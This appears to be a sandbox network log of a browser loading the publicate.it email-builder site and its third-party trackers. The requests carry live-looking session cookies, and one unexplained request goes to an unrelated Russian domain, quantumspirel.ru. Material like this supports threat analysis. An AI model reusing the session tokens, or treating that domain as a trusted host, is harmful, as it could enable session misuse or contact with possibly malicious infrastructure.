Source: global traffic HTTP traffic detected: GET /css/webflow.css HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /css/publicateit.webflow.css HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/2000px-Pepsi_logo_new.svg.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/amazon.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/trustpilot-1.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/2000px-Pepsi_logo_new.svg.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/amazon.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/group-2.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/trustedby.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/download.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/home_banner.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/home_banner-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /20234315.js HTTP/1.1Host: js.hs-scripts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /js/sharethis.js HTTP/1.1Host: platform-api.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lftracker_v1_bElvO73dOjE4ZMqj.js HTTP/1.1Host: sc.lfeeder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/microsoft.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4 HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://publicate.itsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/adobe.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/trustpilot-1.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/group-2.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET // HTTP/1.1Host: quantumspirel.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/groupon.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /js/webflow.js HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/logo_white_text.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/trustedby.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
Source: global traffic HTTP traffic detected: GET /images/download.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
Source: global traffic HTTP traffic detected: GET /images/home_banner-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
Source: global traffic HTTP traffic detected: GET /images/nhph1-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
Source: global traffic HTTP traffic detected: GET /images/nhph2-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
Source: global traffic HTTP traffic detected: GET /track/ce/?project=publicate.it&instance=woopra&meta=&screen=1280x1024&language=en-US&app=js-client&referer=&cookie=sB4hScRiWkjO&event=pv&timeout=600000&idptnc=eNCnXL5OXflh&ce_campaign_name=powered_by_publicate&ce_campaign_medium=referral&ce_campaign_source=publicate_user_exported_emails&ce_url=%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_title=Publicate%20%7C%20HTML%20Email%20Template%20Builder&ce_domain=publicate.it&ce_uri=https%3A%2F%2Fpublicate.it%2F%3Futm_source%3Dpublicate_user_exported_emails%26utm_medium%3Dreferral%26utm_campaign%3Dpowered_by_publicate&ce_scroll%20depth=0.17704470037087644&ce_returning=false HTTP/1.1Host: www.woopra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/nhph3-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1
Source: global traffic HTTP traffic detected: GET /images/nhph4-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /alvis-onboard-1.0.8.js HTTP/1.1Host: assets.getalvis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/outlook_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
Source: global traffic HTTP traffic detected: GET /images/gmail_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
